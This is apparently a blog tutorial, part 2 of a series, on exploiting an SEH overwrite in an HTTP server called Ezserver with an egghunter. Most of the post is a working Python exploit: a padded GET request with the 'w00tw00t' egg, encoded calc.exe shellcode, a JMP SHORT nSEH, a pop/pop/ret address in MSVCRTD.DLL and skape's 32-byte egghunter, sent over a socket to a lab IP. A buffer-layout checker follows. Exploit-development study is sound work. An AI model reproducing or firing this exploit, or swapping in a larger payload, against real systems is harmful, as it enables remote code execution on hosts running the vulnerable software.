Wednesday, October 03, 2012

SEH Exploit Ezserver part 2 (egghunter)

In part 1 we got as far as generating the payload for calc.exe.
Why calc? Because that payload is small, and a small payload is enough to prove that the crash found by the fuzzer is really exploitable.
Why not a bind shell payload instead? Because there is not enough space left in the buffer to land a payload of that size.

So I try an egghunter instead (for background on how egghunters work, see the linked reference).

This is the scenario:

buffer = nop0 + "w00tw00t" (egg) + payload + nop1 + nSEH (JMP SHORT +6) + SEH (pop/pop/ret address in MSVCRTD.DLL, the stepping stone) + nop2 + egghunter

When the exception fires, the overwritten SEH handler points at a pop/pop/ret in MSVCRTD.DLL, which returns into nSEH. The JMP SHORT there skips the 4-byte handler address, lands in the nop2 sled and slides into the egghunter. The egghunter only needs 32 bytes, so it fits where the calc payload did not; it then scans memory for "w00tw00t" and jumps to the payload placed right after the egg.

#!/usr/bin/python
import socket

target_address = "192.168.56.101"
target_port = 8000

# nop0: padding before the egg, offset found in part 1
buffer = b"\x90" * 5427

# skape's 32-byte egghunter (int 0x2e syscall variant). It walks memory page by
# page, skips pages that are not readable, and looks for the tag "w00t" twice in
# a row; when found it jumps to the byte right after the second tag.
egghunter = (b"\x66\x81\xCA\xFF\x0F\x42\x52\x6A"
             b"\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
             b"\xEF\xB8\x77\x30\x30\x74\x8B\xFA"
             b"\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")

# encoded calc.exe shellcode generated in part 1
payload = (b"\xbf\x31\x61\x90\xb0\xdb\xc9\x2b\xc9\xd9\x74\x24\xf4\xb1\x51\x5b"
           b"\x31\x7b\x12\x03\x7b\x12\x83\xda\x9d\x72\x45\xe0\x34\x98\xeb\xf0"
           b"\x30\xa1\x0b\xff\xa3\xd5\x98\xdb\x07\x61\x25\x1f\xc3\x09\xa3\x27"
           b"\xd2\x1e\x20\x98\xcc\x6b\x68\x06\xec\x80\xde\xcd\xda\xdd\xe0\x3f"
           b"\x13\x22\x7b\x13\xd0\x62\x08\x6c\x18\xa8\xfc\x73\x58\xc6\x0b\x48"
           b"\x08\x3d\xdc\xdb\x55\xb6\x43\x07\x97\x22\x1d\xcc\x9b\xff\x69\x8d"
           b"\xbf\xfe\x86\x32\xec\x8b\xd0\x58\xc8\x97\x83\x63\x21\x73\x27\xe8"
           b"\x01\xb3\x23\xae\x89\x38\x43\x32\x3f\xb5\xe4\x42\x61\xa2\x6a\x1c"
           b"\x93\xde\x23\x5f\x7d\x78\x97\xf9\xea\xb6\x25\x6d\x9c\xcb\x7b\x32"
           b"\x36\xd3\xac\xa4\x7d\xc6\xb1\x0f\xd2\xe6\x9c\x30\x5b\xfd\x47\x4f"
           b"\xb6\xf6\x85\x1a\x23\x05\x75\x74\xdb\xd0\x80\x81\xb1\xb4\x6d\xbf"
           b"\x99\x69\xc1\x6c\x4d\xcd\xb6\xd1\x22\x2e\xe8\xb3\xac\xc1\x55\x5d"
           b"\x7e\x6b\x84\x34\xe8\xcf\x5d\x46\x2e\x58\x9d\x70\xda\x77\x30\x29"
           b"\xe4\xa8\xda\x75\xb7\x67\xf2\x22\x37\xa1\x57\x99\x38\x9e\x30\xc4"
           b"\x8e\x99\x88\x51\xee\x70\x5a\x09\x44\x28\xa4\x61\xf7\xba\xbd\xf8"
           b"\x3e\x43\x15\x05\x68\xe1\x66\x29\xf3\x60\xfd\xaf\x94\x17\x90\xa6"
           b"\x80\xb2\x3a\xe1\x63\x8f\x32\xf6\x1e\x4b\xcc\x1a\xef\x93\x3d\x70"
           b"\xee\x56\xef\x7a\x4d\x7b\x7c\x0f\x28\xbb\x29\xa4\x66\xd3\x5f\x44"
           b"\xcb\x32\x5f\xcd\x68\xc4\x49\x76\x26\x68\x27\xd9\x99\xe6\xc6\x88"
           b"\x48\xa2\x99\xd5\xbb\x24\xb7\xf0\x39\x7b\x94\xfd\x94\xe9\xe4\xfe"
           b"\x2e\x11\xca\x8b\x06\x11\x68\x4f\xcc\x16\xb9\x1d\xf2\x39\x2e\xdf"
           b"\xd4\x58\xdc\x4c\x1a\x4a\xdc\xa2")

buffer += b"w00tw00t"          # egg: the hunter's tag, twice (it does two scasd compares)
buffer += payload              # the calc shellcode sits right after the egg
buffer += b"\x90" * 100        # nop1

buffer += b"\xeb\x06\x90\x90"  # nSEH: JMP SHORT +6, over the SEH handler address
buffer += b"\x96\x96\x20\x10"  # SEH: 0x10209696, pop/pop/ret in MSVCRTD.DLL (stepping stone)

buffer += b"\x90" * 16         # nop2: where the JMP SHORT lands
buffer += egghunter
buffer += b"\r\n\r\n"

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address, target_port))

sock.send(b"GET /" + buffer + b"HTTP/1.1")
print("sent")
sock.close()
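A layout check for the buffer above, as an added example (not code from the original post): it pulls the tag out of the egghunter bytes, resolves the JMP SHORT in nSEH, and confirms the jump lands on the nop2 sled in front of the hunter, so a wrong rel8 is caught before anything is sent. The calc shellcode is replaced by a constructed 344-byte stand-in of the same length so the offsets match the script; the BAD_BYTES set (NUL, CR, LF) is my assumption of what would truncate the request line, not a bad-character list from the post.

```python
import struct

# Building blocks copied from the script above; only the calc shellcode is
# replaced by a constructed stand-in of the same length (344 bytes).
EGG_TAG = b"w00t"
EGGHUNTER = (b"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
             b"\xEF\xB8\x77\x30\x30\x74\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")
NSEH = b"\xeb\x06\x90\x90"       # jmp short +6 (2 bytes) padded to 4
SEH = b"\x96\x96\x20\x10"        # 0x10209696, pop/pop/ret in MSVCRTD.DLL per the post
SAMPLE_PAYLOAD = b"\xcc" * 344   # constructed stand-in for the calc shellcode
BAD_BYTES = b"\x00\r\n"          # assumption: bytes that would cut the request line short


def egghunter_tag(hunter):
    """Return the 4-byte tag a skape-style int 0x2e egghunter searches for.

    The tag is the imm32 of `mov eax, imm32` (opcode 0xB8) that sits right
    before `mov edi, edx; scasd; jnz; scasd; jnz; jmp edi`. Two scasd
    compares mean the egg in memory must be the tag repeated twice.
    """
    i = hunter.index(b"\xb8")  # first (and in this hunter, only) 0xB8
    return hunter[i + 1:i + 5]


def jmp_short_target(code, at):
    """Resolve `jmp short rel8` (EB xx) at offset `at`; return the target offset.

    rel8 is relative to the end of the 2-byte instruction, so +6 from nSEH
    skips the 2 padding bytes of nSEH and the 4-byte SEH handler address.
    """
    if code[at] != 0xEB:
        raise ValueError("no jmp short at offset %d" % at)
    rel = struct.unpack("<b", code[at + 1:at + 2])[0]
    return at + 2 + rel


def build_buffer(payload=SAMPLE_PAYLOAD, pre=5427, nop1=100, nop2=16, nseh=NSEH):
    """Assemble the buffer in the post's layout and record where each part starts."""
    parts = [
        ("pre", b"\x90" * pre),
        ("egg", EGG_TAG * 2),
        ("payload", payload),
        ("nop1", b"\x90" * nop1),
        ("nseh", nseh),
        ("seh", SEH),
        ("nop2", b"\x90" * nop2),
        ("egghunter", EGGHUNTER),
    ]
    buf, offsets = b"", {}
    for name, part in parts:
        offsets[name] = len(buf)
        buf += part
    return buf, offsets


def check_layout(buf, offsets):
    """Return a list of layout problems (empty means the buffer is consistent)."""
    problems = []
    tag = egghunter_tag(EGGHUNTER)
    egg = buf[offsets["egg"]:offsets["egg"] + 8]
    if egg != tag * 2:
        problems.append("egg %r is not the hunter tag twice (%r)" % (egg, tag * 2))
    target = jmp_short_target(buf, offsets["nseh"])
    # the jump must land somewhere in nop2 or exactly on the hunter itself
    if not offsets["nop2"] <= target <= offsets["egghunter"]:
        problems.append("nSEH jmp lands at %d, outside nop2/egghunter" % target)
    for b in BAD_BYTES:
        if bytes([b]) in buf:
            problems.append("buffer contains bad byte 0x%02x" % b)
    return problems


if __name__ == "__main__":
    buf, off = build_buffer()
    print("total length %d, SEH record at %d" % (len(buf), off["nseh"]))
    print("problems:", check_layout(buf, off) or "none")
```

Run it before firing the real script: with the post's values the SEH record starts at offset 5879 and the jump resolves to the start of nop2; change the rel8 to +2 and the check reports the jump landing on the handler address instead.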




alhamdulillah ... :D
